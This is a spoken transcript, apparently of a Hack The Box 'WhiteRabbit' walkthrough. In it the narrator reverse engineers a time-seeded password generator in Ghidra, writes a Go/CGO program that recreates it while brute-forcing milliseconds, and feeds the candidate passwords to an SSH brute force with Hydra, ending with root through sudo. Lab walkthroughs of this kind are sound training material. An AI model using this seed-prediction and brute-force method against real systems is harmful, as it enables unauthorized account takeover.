Morpheus's password, so we can't really do anything there. If we go back to like all the SQLite stuff, actually not SQLite, the SQL dump. But before I do that, if we look at home, there is a Neo user. If we go in Neo, we can't, but what I was saying is, let's see, let's go back to SQL, let's see, what is this? As local share SQLMap, awesome. Output, this host, dump, and this should give us all the tables. Let's see, temp. Okay, command log.csv. So we can see the command log. This was all the SQL commands that were run, but they went to cd home neo, and they used this neo password generator. And if we go to this box, let's see, cd/opt, there is a neo password generator. And if we run this, we get a random password every time we run it. So if we echo -n, whoops, burst this in, wc-c, it is going to be 20 characters. So we have them going in, running the password, and we also have the time they ran this command. And one of the big vulnerabilities with password generators is just an insecure use of like a seed. So maybe if they just use the seed based upon this time, we'll be able to create another program that mimics how they generate the password, set the time to this exact second, run the command, and then get the password. So let's go over here. Let's see. Let's just copy this. So let's do sep-i Morpheus at WhiteRabbit.htb opt neo password generator. Just copy this here. Hopefully that works. There we go. It's copying. So let's open up opt. I should have Ghidra, right? Maybe I don't have Ghidra installed. I'm going to go ahead and install Ghidra real quick so we can reverse this. Or maybe I can do it on video. It shouldn't take too long. Download Ghidra. I'm really surprised that's not on my box. Let's see. Go over here. I don't know if I want Ghidra Lite. Since when do they have Ghidra and Ghidra Lite? I'm so confused. Okay. Download from GitHub. What's new? Let's download the zip. Save it. I really thought I had Ghidra installed, but I guess not. That should be done downloading in a second. Move, downloads, Ghidra 12, 0 public.zip. Is it done? It is. grep-i Ghidra. Oh, I don't have permission in the opt directory. So let's do sudo. Make dir Ghidra sudo 7zx. Unzip it. I'm so confused that why I don't have it. Okay, go in Ghidra. Ghidra run. And hopefully there's no... Oh man, I have to install the JDK. I'm just going to pause the video and we will get this working. Okay, so this is the JDK I installed. It's not the one I normally do, but I couldn't find OpenJDK 21 on the version of Parrot I'm running, so that worked for me. But you may just want to run, like doing sudo apt search OpenJDK-21 and find one that works for you there. But now if I run Ghidra run, it looks like it opened, so hopefully, everything just works. It's been so long since I used this. So we'll do new project, non-shared. Let's just do dev shm. Doesn't matter the name because I don't save these. Click the little dragon icon. And I'm also no longer in dark mode. I miss my old config. I think I can hit I for import. Awesome. Let's go to HTB. This box is WhiteRabbit. Then let's see, neo password generator. Okay. It is creating the entry points. Analyze, yes. Analyze. Okay. And it should take a couple seconds for it to magically work. We go exports, main. There we go. So we have essentially what the program is. We're going to do get time of day and then generate password. If I look at what generate password is, we have this string. And it's essentially just going to get a random number and get it from this string. And it's using a modulo operator. So all we do is get the time of day, set random or set the seed, and then pick a generate random and grab a character from this. So this should be relatively straightforward to create. And I'm going to create a program in Golang, mainly because I know all the other write-ups are using Python, so I'd rather be somewhat different, and I like Go. So let's call this pwgen. And the real key thing that we have to do here is use CGO, because every language is going to have its own implementation of setting a seed. So if we just did it all in Golang, it's probably going to set the seed differently than if we used libc. The same goes with Python, Rust, Node, whatever. Whenever doing some type of crypto like setting seeds, always do it in the language that is running. So I'm just going to do code dot. We can close this VS Code window out. So I'm saving some resources. And let's see what we want to do. The first thing we'll have to do is import C. And then when we import C, we'll also have to include a standard library. So do new file. I'll call it main.go. There we go. And then package main. Let's trust folders. So we have Copilot. I probably should have installed the Go extension. It's probably not going to work now, or Copilot isn't. Let's do import C. And then we also want to, let's see. It's an include, right? Yeah, include standard lib. There we go. I think that's how we do it. I think we do a comment first like this. It's been so long since I used CGO. But yeah, that looks fine. Now we can just import all the other things we need. Probably format strings, and then we also need time. And now let's do a global variable for the character set we're going to be using. And I'm going to go back here, and we're going to copy this character set, paste it. Awesome. And then let's create a function, generate password. And I'm going to pass in the seed. And this will return a string. And we can do c.srand. And then unsigned integer, the seed. That should be fine. I'm thinking, yeah, we passed in the seed. Okay. So let's do out. And this is going to be a 20 character string. So we'll create a array of 20 characters. And then for I is equal to 0, I over 20. Let's increment it. And then what do we need? Is this at rand index? We call rand percent. I don't know if we want to do this. I think I just do len the char set. That should be fine. So this is mimicking, where is it in the code? Are we in generate random? We are. We're going here. Yeah, it's just mimicking this. So what we're doing here is calling random, and then we do modulo. So if the if it's 24, our character set's only 4, so it goes through the whole string 20, and then goes up 4, so it gets the 4th character here, which would be D. So that's all that is doing. And now we say the position is going to be that character. So this should be it for the generate random string. What is this calling an error on? srand is unknown. c.srand. That is right. Okay. That's just calling the random function. Did we call it here? Yeah, that's mimicking this line. Okay, so now let's create main. Let's see. We need to parse the timestamp. So we can say parse timestamp, t error time.parse. And I'm just going to give it a string. So we'll do 2006 like that, I think. I don't know if we want to give it a time zone. I think that's all we need. And then we want to pass in OS args. Is args capital? OS dot. Yep, there we go. Pass in the very first argument. If we can't parse the time, then we'll kill the program right then. And let's see, we're going to have seed. That should be fine. And then random string. This should be fine, but this isn't going to work, I don't think. Let's just do go run main.go because there's one piece that's missing. We have to give it a timestamp, of course. Let's see. I don't know where. Let's do local share, SQLMap, output. Yes, it was in temp, cat command log. This is the timestamp it was ran. So this will give me one password, hopefully. Undefined OS. I'm guessing this because I didn't install the Golang extension. It didn't automatically add that library for me. Invalid operation. cran %. What line is that? 21? This. What am I doing wrong here? Oh, we probably have to say integer of this. There we go. We can probably get rid of T. There we go. So it's always giving us this password. So if we try this, let's go here. We probably guess this is going to be Neo's password just because they're going in home Neo. So let's go where we have the Morpheus shell. Let's see, sh-i Morpheus at WhiteRabbit.htb. Oh, we probably need to su to Neo. That fails. Let's do su, Neo. And this fails as well. Now, the whole random is up to the millisecond, right? And our timestamp is not up to the millisecond. So what we have to do is brute force the milliseconds, which could be 0 to 1000, right? So let's go ahead and add that. So I'm going to create a map, and this is going to be like a set in Python. So we're just going to do map string struct. And we can say for microsecond or millisecond, I think it is equal to 0 until 1000. We increment 1. And then we can say current seed is equal to, is that right? I don't know if this is right. Seed times 1000 plus, let's make this an int 64. Is this right? I think it is. pw is equal to generate random string. And we can say, if this exists, then let's append it to our struct. So scene pw is equal to this. And then we can also print the string. We don't want exist. We want like that. That should be fine. Mismatched int and N64. Okay, we have a list of all these passwords. So I'm going to do directed to passwords, and then I'm going to use Hydra. And the reason we use Hydra here is just because it's very quick. I know a lot of people, including me at first, my gut was to use like netexec, but netexec's threading is actually based upon host. So if you use netexec here, it's just going to go extremely slow, like netexec, SSH, WhiteRabbit. Username could be neo or root. We don't know that yet. Passwords. It's going to try these one at a time. WhiteRabbit.htb. There we go. But it's going to try this one at a time because the threads in netexec is based upon host. So if we gave it like WhiteRabbit, WhiteRabbit2, WhiteRabbit3, it would run an SSH brute force on each of those hosts simultaneously. The thread does not go into one host and then try like 5 passwords at once. That's just, unfortunately, not how it works. So I'm going to kill netexec, and we're going to run Hydra. So we'll do Hydra, the username, neo, capital P for the password list, and then SSH : WhiteRabbit.htb. And I can put a time beforehand so we can see exactly how long it takes, but I think Hydra would also tell us. So let's see, many SSH configuration limits parallel task. It's recommended to use T4. But it looks like we didn't have to. We have the password right here for neo. So let's go back over to where Morpheus was. Did I already close that window? I think I keep closing that. Oh, no, here we go. Let's go su neo, paste in this password, and there we go. We can do sudo -l, put in neo's password, and we can run any command on this. So we do sudo su, and there we go. We are root on the box. So that's going to be it. Hopefully you guys enjoyed it. Take care, and I'll see you all next time.